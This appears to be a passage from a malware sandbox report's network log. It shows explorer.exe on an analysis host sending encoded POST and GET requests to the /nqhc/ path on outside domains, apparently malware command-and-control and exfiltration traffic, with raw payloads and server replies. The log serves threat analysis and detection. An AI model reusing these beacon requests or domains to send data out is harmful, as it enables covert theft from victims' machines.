                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          17192.168.11.204985538.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:52.401490927 CET11345OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 35 41 59 38 70 4b 71 49 77 34 4f 46 38 58 69 56 71 4d 63 43 6f 70 48 5a 36 66 76 67 33 77 63 64 44 6c 65 52 69 4c 63 52 7a 4b 68 5f 69 47 34 49 67 34 30 34 59 4e 47 53 76 51 4a 50 5a 76 47 30 77 6e 39 32 56 65 63 52 73 76 37 56 75 78 56 6b 5a 62 39 71 37 71 52 72 4b 61 31 4f 34 6d 73 6c 63 46 6e 69 47 55 66 39 37 59 38 37 42 58 34 70 49 4f 75 47 53 68 71 72 55 62 41 31 52 79 38 73 72 4a 37 4d 37 67 48 36 67 70 4d 6d 64 53 33 6b 47 66 42 76 49 62 48 78 58 63 7e 63 6a 76 7e 64 63 71 61 5a 6e 4c 76 68 74 36 37 74 35 71 67 46 66 5a 64 76 51 6c 6d 65 67 4c 6b 61 43 6e 72 56 73 57 38 79 66 61 66 65 6d 72 55 62 6d 6e 65 52 65 58 34 63 44 34 70 45 51 50 51 32 38 6e 72 5f 37 4b 43 6b 34 58 62 43 41 6d 55 6e 70 42 58 30 38 65 53 76 58 34 4f 45 51 4c 6f 52 42 71 35 36 79 7a 31 34 75 4a 4a 69 4a 47 63 4f 49 32 71 44 4e 59 57 78 75 6d 37 33 4d 34 51 71 33 50 4a 6e 7e 45 66 6d 6d 6c 6f 4b 7e 6e 58 63 59 4d 61 79 64 72 48 58 5a 43 71 6f 7e 38 28 74 72 62 42 4e 55 5a 36 39 35 7a 69 5a 56 4a 70 53 4f 47 73 4a 49 64 38 64 67 46 41 31 66 57 55 77 35 69 35 6c 39 52 70 36 74 54 50 35 69 38 41 37 72 72 70 6e 48 39 49 35 55 46 6b 6b 4d 6b 66 37 71 6f 6e 78 67 34 6c 57 61 74 44 4c 65 43 62 4e 30 34 78 34 46 32 58 44 51 37 61 64 69 46 4e 4e 68 5f 6f 43 4d 4c 6c 5a 66 7a 6c 52 6f 56 74 32 58 58 53 77 78 34 48 67 38 71 69 67 65 70 44 4f 4c 63 4e 56 30 58 67 54 64 45 74 74 6b 5f 53 62 28 46 76 73 43 38 54 63 58 36 6d 64 52 49 30 79 77 70 4a 51 65 4f 32 37 6f 36 48 62 59 77 5a 66 44 36 75 47 64 4b 43 43 6a 7a 6c 48 78 48 6b 4e 39 46 58 4a 70 63 66 58 59 63 68 45 53 56 70 31 47 64 68 65 48 48 6a 79 4b 48 79 79 33 48 75 6b 32 6a 6d 74 63 48 56 4e 74 7a 4a 44 58 56 50 7a 43 64 55 30 58 53 63 43 44 4c 61 34 58 34 36 4e 39 5f 6b 6d 62 63 75 6a 44 63 53 43 62 66 71 52 42 62 47 42 35 50 47 38 74 43 53 6c 4e 5a 4c 4b 31 50 70 46 7a 55 7a 53 4c 47 58 46 52 31 4c 61 48 6c 6f 59 79 39 47 7a 67 54 43 57 78 30 44 4a 76 51 50 6c 33 48 48 33 7e 5f 6b 59 35 49 73 7a 75 58 30 79 71 68 45 33 55 54 56 47 44 4a 28 58 55 7a 62 38 63 51 36 79 43 54 74 30 58 78 36 43 5a 72 68 59 37 73 42 41 68 74 79 34 30 36 50 45 61 6c 30 6e 71 62 4c 71 6f 50 6d 6f 45 50 78 7a 4d 64 65 77 36 75 70 51 77 46 39 75 32 31 35 51 4c 76 62 36 28 32 5a 6b 73 47 50 69 75 43 58 37 38 4e 38 45 69 71 6c 55 66 76 7a 4e 69 35 45 67 79 39 37 62 47 47 61 64 69 69 49 4d 48 66 6e 6f 6c 64 42 67 7a 5a 73 70 6b 75 35 42 4a 6b 47 69 31 51 4f 78 6f 4f 28 4c 55 72 43 76 6f 66 61 49 35 49 69 64 38 72 69 4e 55 69 53 52 78 35 48 30 79 36 6b 6e 39 52 71 48 6f 57 49 73 4d 36 67 71 62 6f 78 30 6c 67 55 70 6f 4e 45 6a 6f 73 42 77 62 57 61 74 35 4a 46 59 76 65 69 6f 7e 2d 7a 30 50 4b 76 66 64 54 74 73 37 79 55 5a 77 74 70 70 30 41 62 57 79 72 50 56 65 30 54 55 4c 54 48 51 4c 4f 35 2d 6e 4f 44 65 42 54 34 42 4b 31 45 42 6a 75 7a 31 51 36 49 7a 65 6f 74 36 6c 71 77 52 43 62 69 33 66 65 33 2d 6d 6d 39 6b 6b 36 6d 61 79 43 4c 67 64 57 41 5f 6f 49 55 42 6d 6b 39 56 6c 6c 35 64 69 73 7e 58 38 46 67 64 41 54 7a 35 78 78 6d 37 7e 6e 54 50 30 53 5a 44 47 69 39 63 67 6e 31 74 4f 56 49 41 42 45 37 55 37 57 58 75 37 2d 79 48 57 75 63 6f 57 57 7e 6d 4f 62 42 39 36 6d 45 42 65 45 48 44 6c 43 49 33 47 6c 34 30 6f 31 74 6a 54 46 57 72 76 30 4d 5f 75 6b 36 6b 65 49 32 74 62 64 33 53 4f 57 73 68 39 69 31 65 7a 34 56 73 72 4c 34 5f 76 69 63 42 71 6e 51 59 41 31 6c 57 7e 31 79 52 35 45 66 59 69 56 28 51 71 4a 6f 6e 38 75 61 64 43 4e 6e 50 61 39 35 62 28 57 78 4c 6c 6d 33 47 77 43 4d 4b 31 57 72 67 4b 75 65 47 68 6a 67 62 67 56 46 4d 4f 70 47 55 73 55 6e 46 4f 4f 63 4e 6d 41 6a 57 67 2d 53 30 50 4d 44 6f 45 37 69 55 43 78 71 41 51 78 4f 44 43 6f 61 62 65 34 69 64 30 72 76 30 53 50 61 77 37 7a 64 7a 34 74 49 65 67 48 33 79 6d 37 62 73 57 6f 64 4d 79 69 6c 68 43 52 6e 52 74 30 56 49 34 58 71 63 63 30 6d 43 43 43 62 75 62 66 66 38 67 59 54 30 59 71 75 4c 70 65 31 59 7a 4c 6b 31 51 2d 36 44 70 6d 70 56 49 44 4f 64 68 59 70 43 5a 45 47 35 48 4f 79 46 48 6b 75 78 37 50 49 35 44 66 41 45 31 6c 7e
                                                                                                                                                                          Data Ascii: 7nWHV=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGe5AY8pKqIw4OF8XiVqMcCopHZ6fvg3wcdDleRiLcRzKh_iG4Ig404YNGSvQJPZvG0wn92VecRsv7VuxVkZb9q7qRrKa1O4mslcFniGUf97Y87BX4pIOuGShqrUbA1Ry8srJ7M7gH6gpMmdS3kGfBvIbHxXc~cjv~dcqaZnLvht67t5qgFfZdvQlmegLkaCnrVsW8yfafemrUbmneReX4cD4pEQPQ28nr_7KCk4XbCAmUnpBX08eSvX4OEQLoRBq56yz14uJJiJGcOI2qDNYWxum73M4Qq3PJn~EfmmloK~nXcYMaydrHXZCqo~8(trbBNUZ695ziZVJpSOGsJId8dgFA1fWUw5i5l9Rp6tTP5i8A7rrpnH9I5UFkkMkf7qonxg4lWatDLeCbN04x4F2XDQ7adiFNNh_oCMLlZfzlRoVt2XXSwx4Hg8qigepDOLcNV0XgTdEttk_Sb(FvsC8TcX6mdRI0ywpJQeO27o6HbYwZfD6uGdKCCjzlHxHkN9FXJpcfXYchESVp1GdheHHjyKHyy3Huk2jmtcHVNtzJDXVPzCdU0XScCDLa4X46N9_kmbcujDcSCbfqRBbGB5PG8tCSlNZLK1PpFzUzSLGXFR1LaHloYy9GzgTCWx0DJvQPl3HH3~_kY5IszuX0yqhE3UTVGDJ(XUzb8cQ6yCTt0Xx6CZrhY7sBAhty406PEal0nqbLqoPmoEPxzMdew6upQwF9u215QLvb6(2ZksGPiuCX78N8EiqlUfvzNi5Egy97bGGadiiIMHfnoldBgzZspku5BJkGi1QOxoO(LUrCvofaI5Iid8riNUiSRx5H0y6kn9RqHoWIsM6gqbox0lgUpoNEjosBwbWat5JFYveio~-z0PKvfdTts7yUZwtpp0AbWyrPVe0TULTHQLO5-nODeBT4BK1EBjuz1Q6Izeot6lqwRCbi3fe3-mm9kk6mayCLgdWA_oIUBmk9Vll5dis~X8FgdATz5xxm7~nTP0SZDGi9cgn1tOVIABE7U7WXu7-yHWucoWW~mObB96mEBeEHDlCI3Gl40o1tjTFWrv0M_uk6keI2tbd3SOWsh9i1ez4VsrL4_vicBqnQYA1lW~1yR5EfYiV(QqJon8uadCNnPa95b(WxLlm3GwCMK1WrgKueGhjgbgVFMOpGUsUnFOOcNmAjWg-S0PMDoE7iUCxqAQxODCoabe4id0rv0SPaw7zdz4tIegH3ym7bsWodMyilhCRnRt0VI4Xqcc0mCCCbubff8gYT0YquLpe1YzLk1Q-6DpmpVIDOdhYpCZEG5HOyFHkux7PI5DfAE1l~81Bu2AxsMYWtPUWiwzjRzyziREHFfQ0Hqf9M-zhYg2-29JKQ-1VKNq_6f3K3cJKdQpTaCp5BtEg8-tA0N1HMR21K85bfYijlfFcppg-hONfCJ3CyLXKdVkJ3oe7QNQDXq6_dtar4XJB3eBwfceAuZSLQDr5LWBGpWLJsYBNIvpb6QxlsgKSZIhYe3uJYYsH73SxgcQEZXcz91MgbyWlen75Ss8_57KuKXqFDwfq2nAt7oSYUbb3CrrUwaP9z_Gh9WHe3ukzpRXr0cXVhwKBlhdSDVI8bOJhg0RIzpthgdGkSg6v~ccqGcuzj11uBa1rw2uIGWusAIaJ6dVTWwY2z_0vvT(SxxE2xogwFEFyxVzPghHGopetkplG(cspg70chkYLY0z9DHDFP8O5oebmtSUltMmp5LlVY5zvxI(_mzFJM-JmV8pIKZP2lOldZX8YytCcnUEr5Mi-kSLcnG7FtSzgOMRvUnxTztM4R0E2jz7WeMwgpELOiNmCNGjOJ5dDgVj0EhCoko2UBpp5GEYkKa9buWMTRpTb7hJuNb61S2Tp9iG8r8k2fZ2G6ywi0oT3B9rTK2c0qGiv70o8nPdNL3W1e_gFFtkF4SUt9iEiuVz6ksIxrVT9mywjDgjxX2~EpTTDKSDQjwqW67mEqGfoD6NwlO1xfpgp2jBaoypNTNedjtdPpW2tnFAGUw6kBMS2E4o8EAMUVT~1zvrhWW4-aqpqaKjuK1ZugpJ1dxKrYyOEytcscRVZZrqVIGeJH9B1lzv5zfhkJUVLsNgyaQMeIfNUQgJ5rohKUrE7g-eyGtVqLbz32kl9FAX2tOcSfiD4OJYq3-qN9meIOpx-RTp6dBF463(le61xM-ELDgRDXcSazgUFeGi_EsW4ydQMt6qooIFqhwf-c3UROILsyvi3W2lwePEGyIx-MB~sMiPW2cRFKrJTUioQSqsDyKqutrtIWrOUrnMcARkPY-mqPpH67c8bheXIwcmog6A78L(SZJ42N5R2xpJ3jh1PkWCRwPsd3I3wP9406TDx1VLB3xLzjrIE~nU72_O_djcithReMOnJZm1aK2SYcgyp8-duA7jQTAMerQOjvYfU7H3bCppZM2KCySPuFdzmCknus0(YuCWewhCcni63AmHl05m3kKsSi92ZpQkqDiwg7p0uno0ESlmtpZyMxbTMBMktX18C7R1PWPQGgsuoesc4XBoAf_v2zWixCz(XLvasYfkESU1xtLji9u23(8(bKL7Z9isPPOzHJ6z6uqhDcI6ztBpiYt8qKQgyf2E6VlOXJ9dlWpAJfPd7S3BTKDrq(XHdApDWQ0R0Bmy3R7We2v69vdt4(QpNCaX5ZWNx0J63elxr5wIUf9FV(GsGnl2-n0ihuSUw0JIe(pTYnvhQf4Rx20(WNovcLjUJ95(x1kue2d~0ZwDLnrABsdSamqCSLzrj2sEDmPY26t3NVg(mYxc2ZwrtVUpD7t3A(IO8eW2iVwHsARzy8XvA8yVuZzAN7A49O-snKaB3GRB1ADmDLU7VgKmsU9WHXka4f1nhOwTjY5uXWkmZpygt0FLK73TMAF4GFQqMdQZmLsgsXeSXaNxDP-OoD1OeMz9pqM4PVgFXL1PPIXU6rGbc~MFIce36vhbybgUsYOD7e2RbpV8bsM0XCbGkUGVAV1s9tkwapMtdZK~Dj9bhho8LnyDI(qZkukuEE_Q1A72dT9fRdcWoZ6EY1q91~hNd6WQItMoN~TOSGpX0pUEuhdljpd1B9jgmFgvIihdN1-TYLf2uw5BJRL4jeNsfl_o_PpSXGnFpaF~hniy4hmAIGqhYXR1EId4dzTixTBThBn9UfE0ax2C6fIboTx6yMVMwtsMuiJEc(4(aokKFyDQgIuxbLPJm(Dp06GDytDutSrTdRFxiAIaR28Y2VFiDscWpDeM25R5PML5FkKJ5jzMVv2J_ZlLkJJboAWiMFx5zbTCelSqOAb2FL5bTGnyqiTMMg7synymKDVR3Uwc30fOqeSr08U6L~gZbjCCfYEepaXmJWL0M9qk4rTYqBuOHNSEHC0AJ26lNn9Q86tEDoBy7cXNrSnFL08x3E4v4pMJhdO1wfFyznVVHjWuse-K8ARSs6RKza4~zUuxGfH52PiusH5VDW_z-idq4xDcoCysSMWoZ7yKPdZO0xZAcBuo17TNW8ppE9fuu6rzZSBgilmeuvP4ppClblPE1OhbM0UAaYI1arIFW8hU-qEcG7m3GqNx7FjO7Ivv962xzDe4M54FOy8y4qM6kVmwV7d4vH9uocco2hojU8NsGu5XBDjLt1Ef1pB9mw4iQMM4LJqW1mThBknCByHtllayEYMpQCKW4HCgkw-q_6UGhnGFXhF(WzSdKY3KkO2(GPkBa~Xo7muin4foDnrROchqa~fEoTPOJRz2pZBzDoNZcALZRvgAbF99aGwK0W5xHB5DAbq2ToVr0ANRR9qIcUPt01xPzViNDqI2_~tXj8P3BCRgT~PtGD6uSYNtXRBiGV4MpeVVNNSeqkeNtJlsp7W4Q5ry3mUELXlB5Ba2-wdD6dZm8~cM2WRdfoae1(gGEMgiXWH6BWL9PmIBa7HmUR_a6tg28HFbDrvURW6ja4BgujrbmTf7eChzPrt0en6qFZv3Rkbpx2vNsuYjQ~2gHnabbgZFAa-khOuHHbyLL1dCsy727He6wl-xUZSvTbHhboiv1M2X7F5iBkjEnZ_wdVD8ToYhj
                                                                                                                                                                          Dec 5, 2022 15:15:52.564922094 CET11348OUTData Raw: 78 48 43 33 74 72 54 67 42 61 6a 79 72 35 74 45 37 76 6a 69 4e 7e 54 77 2d 4b 72 53 4e 48 45 38 45 67 51 77 52 4a 47 78 52 59 38 36 4b 63 51 39 4a 28 65 4b 59 4f 44 61 31 68 4e 34 35 6b 48 32 36 62 4e 7e 52 70 6d 55 6d 78 49 78 56 28 6c 47 49 59
                                                                                                                                                                          Data Ascii: xHC3trTgBajyr5tE7vjiN~Tw-KrSNHE8EgQwRJGxRY86KcQ9J(eKYODa1hN45kH26bN~RpmUmxIxV(lGIYjCnnbCdnlAEeL2EU1eo1FHTVVWaPhQcP_xXVMrFzZvhA-LKRntZ4FiLh4Ca~O0jZq~if7pmo8z0LkfyC1Ywan82V5hfa-qhAFCpEz9cDkD2jHWmxNGjn_VuwYZql1NTjY1OAX4eXSMOXzU3WoqoAEseQ-MZ7QM0R8
                                                                                                                                                                          Dec 5, 2022 15:15:52.565037966 CET11353OUTData Raw: 39 75 6d 56 64 46 65 79 50 30 53 33 55 5a 38 39 54 66 78 49 7a 46 52 46 30 51 59 7a 59 34 41 52 34 49 52 4c 38 43 5a 50 70 78 67 67 59 71 67 7e 5a 58 46 6e 6d 32 61 49 62 61 46 56 32 6e 55 74 2d 62 30 34 52 55 38 6c 63 64 51 4c 48 76 47 31 2d 52
                                                                                                                                                                          Data Ascii: 9umVdFeyP0S3UZ89TfxIzFRF0QYzY4AR4IRL8CZPpxggYqg~ZXFnm2aIbaFV2nUt-b04RU8lcdQLHvG1-R3EKffbMc4eR0dWh8wSCIWEHbyeZuQQOHdPMPDPTXRnAT8N6z_jU~tDO3FQUYfWK4IuPXr0F3va2sdgCSUyxM2PzvSmA(outHbFP7v4wPGQ8bNP0ys2yEDPscLC-D0niiKV_L63Neh(MVJ0-I1KN(DOh0l8w12JbJT
                                                                                                                                                                          Dec 5, 2022 15:15:52.565124035 CET11361OUTData Raw: 5f 6e 5f 6d 4b 39 65 59 45 61 32 30 66 7e 33 79 50 30 43 56 71 37 62 30 4b 6c 57 63 4b 72 35 31 4a 4d 66 78 42 57 59 4a 75 49 54 39 55 6e 6d 6f 46 67 61 4c 2d 65 65 39 42 56 77 61 78 4c 74 42 45 68 6a 36 71 50 54 4a 57 47 47 56 38 78 6a 4f 6a 71
                                                                                                                                                                          Data Ascii: _n_mK9eYEa20f~3yP0CVq7b0KlWcKr51JMfxBWYJuIT9UnmoFgaL-ee9BVwaxLtBEhj6qPTJWGGV8xjOjqt6JuPmgYQkBUHF6ootCMDedlr3aCiF0H1291gMFRsYVN1N0B7lMRfieNfRaXmP8yOgtjI8_FQGNdxVyoJIkuR3ymexfpsaMSN6edOMq53s7YsQqvnHmxgX-IpVKmh6YTiOuKT0LnlSyFBh3Ua0w~HXmm6WN7Rr95U
                                                                                                                                                                          Dec 5, 2022 15:15:52.565279007 CET11363OUTData Raw: 69 45 4b 50 50 68 6a 68 72 36 56 72 63 74 46 51 33 53 68 78 58 77 47 78 6e 66 2d 67 52 49 71 61 41 6a 35 4d 56 7a 37 56 6f 68 4e 70 4a 4e 6d 51 4f 64 44 32 30 4a 30 71 4e 28 36 61 7a 68 5f 6c 46 68 78 70 4a 64 67 28 51 5a 69 43 69 31 4d 64 64 7e
                                                                                                                                                                          Data Ascii: iEKPPhjhr6VrctFQ3ShxXwGxnf-gRIqaAj5MVz7VohNpJNmQOdD20J0qN(6azh_lFhxpJdg(QZiCi1Mdd~Jc-SflFEKpsKVrTQZ5VXfd0O3eEtMrk8i3anJToHuP5npsPqRbm568wsCwx9bXWWCnNUWapvEz2xi1IFv2MxaLTNmdAqIBXCIJCuFzE9KJb3dIR4OzjKSYM960MxxVfjv7wySJ-5Otzir5MI0jzFNRTl3GkYMOPyI
                                                                                                                                                                          Dec 5, 2022 15:15:52.565501928 CET11371OUTData Raw: 64 39 4a 55 50 39 46 6b 55 7e 62 66 39 43 56 43 78 63 5f 58 71 50 42 69 6c 33 32 75 63 42 41 61 6d 4e 37 66 63 37 54 71 67 6b 4e 6a 63 47 6c 71 5f 4c 30 4c 68 4d 6f 42 43 62 4f 48 57 7e 53 78 62 66 5f 35 4a 77 79 79 5f 47 32 67 6a 62 73 5a 58 4e
                                                                                                                                                                          Data Ascii: d9JUP9FkU~bf9CVCxc_XqPBil32ucBAamN7fc7TqgkNjcGlq_L0LhMoBCbOHW~Sxbf_5Jwyy_G2gjbsZXN7eyEv2vyg4PJtAIrFXOsC4pPvO-RTGCKd36Hym4(vIo7Qhnu34sRqQNb4tEvTz27NP_KqlpX83N9fvzC4GsCK5iBox3ttD62osZJX1LNyWrADs9FzX3OtlrNPEMSf38(GYq~gsFdAQRM_1TufqU9vMfVYDEzZdhu4
                                                                                                                                                                          Dec 5, 2022 15:15:52.728391886 CET11374OUTData Raw: 34 59 2d 74 6e 59 57 6e 5f 76 44 64 4d 4d 67 34 5a 34 4c 54 36 77 4f 6e 31 44 2d 47 5f 59 50 76 7a 4c 6f 67 46 51 45 41 53 6d 48 72 41 63 73 74 6d 6f 63 61 70 66 4f 69 45 36 59 4c 6b 73 46 64 42 4d 75 59 57 4b 47 7a 41 69 43 35 6e 6c 76 65 61 64
                                                                                                                                                                          Data Ascii: 4Y-tnYWn_vDdMMg4Z4LT6wOn1D-G_YPvzLogFQEASmHrAcstmocapfOiE6YLksFdBMuYWKGzAiC5nlvead3GwPti8EwArUoAYUEm_d0mG5LrA40IJwbICXFqFpkew~eFlGqlmmAMEP3H6I55t266fnpucJnL2ZDLxxbIKPtxWE_efIIXuIp8n7MEFn_sHcmlyOGw7SzK0BgUOaUFLHKxGUoVGBJhgZ0F0s-p0s_c18tDkcSwNZE
                                                                                                                                                                          Dec 5, 2022 15:15:52.728492022 CET11379OUTData Raw: 38 37 62 56 4d 69 4e 54 4a 66 69 66 52 42 34 54 42 77 6e 38 35 4f 73 57 63 53 68 75 68 28 35 49 59 77 63 4a 54 4d 53 4b 5f 4c 41 67 4b 31 2d 44 6c 44 36 69 48 56 4f 79 62 53 71 76 53 46 30 69 35 44 56 56 6e 4d 79 49 41 46 69 54 33 73 33 54 76 33
                                                                                                                                                                          Data Ascii: 87bVMiNTJfifRB4TBwn85OsWcShuh(5IYwcJTMSK_LAgK1-DlD6iHVOybSqvSF0i5DVVnMyIAFiT3s3Tv39JJNs12DXNQmbi0AOnKLuSxshTtT3(69P8QKQ8BRtxdwSvHqD(s2PYD(TruKvo_vnf5~HEU2gCcJaT8g9s0(LuIR6TXeZIkuYKh5rSYIhcIGU7lvseQ87cHzt8Ck4vB0kasjCnCx_RQbOTiZhXlWwi4p3TbKHzBsS
                                                                                                                                                                          Dec 5, 2022 15:15:52.728557110 CET11381OUTData Raw: 70 71 75 43 5f 61 52 66 76 62 6a 28 35 47 54 33 73 55 52 6b 6b 6b 48 49 73 6e 38 54 35 70 35 6a 49 34 51 49 6f 34 6b 36 7a 47 62 50 79 75 4e 47 59 38 65 41 4d 71 39 55 42 73 6b 33 74 46 47 46 2d 7e 54 45 6d 43 6b 78 37 69 6e 57 45 41 56 48 69 62
                                                                                                                                                                          Data Ascii: pquC_aRfvbj(5GT3sURkkkHIsn8T5p5jI4QIo4k6zGbPyuNGY8eAMq9UBsk3tFGF-~TEmCkx7inWEAVHibgiruP00K1pTFVhTeorqKTLsNDtC5VNlQtuhVfnNl_RbFlpw(GgkqWXP8ylSIfYCwkbrTpCwZi4mkPHFf_5BYoG4X5OuiATAQB5dEICKv2uwXsv65LA-H9XBoZxuHLK9nmSvJNou2AN3oD8vHwI7NiS6~FwQ~-pzkV
                                                                                                                                                                          Dec 5, 2022 15:15:52.728765011 CET11383OUTData Raw: 42 4e 36 33 4e 62 5a 74 34 46 70 45 66 44 74 63 34 6b 4e 75 31 77 6d 79 4e 4b 72 71 63 57 72 55 7a 52 56 4a 61 64 5f 6a 52 36 66 6d 34 6f 66 50 52 6e 78 77 77 73 4f 69 65 57 5f 66 35 69 79 46 4b 4a 6c 41 6a 7a 31 61 64 50 4f 75 36 66 79 6c 75 52
                                                                                                                                                                          Data Ascii: BN63NbZt4FpEfDtc4kNu1wmyNKrqcWrUzRVJad_jR6fm4ofPRnxwwsOieW_f5iyFKJlAjz1adPOu6fyluRXSqUGwrFuvNyVf0xoKqBuKjhe6X8D~8BRY47_isQylYjMsD6_jDX39DmFpqKm8cEfpIjWYZzojlSB3NAat_hSwCA9GVZ3PwBA3qAPMG556VlTiztuHXmuFkltWfML5bWNkXYrV1Em8YfQ5Z40yaqy5DV6pLcgbqEU
                                                                                                                                                                          Dec 5, 2022 15:15:52.728938103 CET11385OUTData Raw: 77 33 48 68 31 66 72 51 4a 4e 2d 6b 75 72 42 7e 35 4c 48 70 42 35 5f 43 42 71 6c 77 51 36 37 77 4a 41 48 78 2d 48 61 7e 39 48 45 6e 5f 53 76 70 70 6f 68 66 51 41 46 77 42 78 62 71 68 49 79 67 53 34 46 39 49 44 74 33 31 69 56 56 59 6f 44 4f 4f 67
                                                                                                                                                                          Data Ascii: w3Hh1frQJN-kurB~5LHpB5_CBqlwQ67wJAHx-Ha~9HEn_SvppohfQAFwBxbqhIygS4F9IDt31iVVYoDOOgyZeYBbpyBW5q69Olrb4brIS3YEFIT~-(XX4B8hoqw15NQZbdQEA3ncsGjc3vCmOsPsbk8DyehRPqluEMzCaDDHHmGqzX1(_NQmXvYV2nSoBAJ~WtX0uEfjwOQeBeFgZEiE-ecQPVIaDKZTsx3o3XkaVs-TYDrj1u-
                                                                                                                                                                          Dec 5, 2022 15:15:52.930581093 CET11386INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:52 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          18192.168.11.204985638.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:54.587519884 CET11387OUTGET /nqhc/?7nWHV=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:15:54.752850056 CET11387INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:54 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 1.0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          19192.168.11.204985775.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:59.869815111 CET11388OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gumba.shop
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 64 70 30 6f 68 78 4d 4d 78 31 43 43 63 66 69 6c 50 4e 6b 5f 72 4f 56 4c 52 44 6a 6b 4e 55 41 6a 5a 44 48 75 62 63 57 4c 64 6e 35 46 64 6a 69 5a 51 34 38 4b 38 65 53 56 4f 50 28 2d 6e 39 67 34 6c 57 49 35 6b 31 55 31 78 53 43 31 58 75 41 43 32 31 56 6e 65 31 4f 61 38 30 72 65 39 38 53 5f 62 72 28 4a 28 37 33 50 31 4d 4d 43 71 36 54 67 4b 76 58 54 49 76 79 65 7a 47 61 63 28 30 28 64 4b 58 67 71 52 73 73 34 55 6d 55 32 6b 51 4a 76 61 2d 4f 47 30 6e 56 79 72 71 55 6a 65 33 45 37 4d 44 62 43 33 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=S6tbconk9Vd-dp0ohxMMx1CCcfilPNk_rOVLRDjkNUAjZDHubcWLdn5FdjiZQ48K8eSVOP(-n9g4lWI5k1U1xSC1XuAC21Vne1Oa80re98S_br(J(73P1MMCq6TgKvXTIvyezGac(0(dKXgqRss4UmU2kQJva-OG0nVyrqUje3E7MDbC3w).
                                                                                                                                                                          Dec 5, 2022 15:15:59.919596910 CET11389INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:59 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a
                                                                                                                                                                          Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx
                                                                                                                                                                          Dec 5, 2022 15:15:59.919660091 CET11389INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
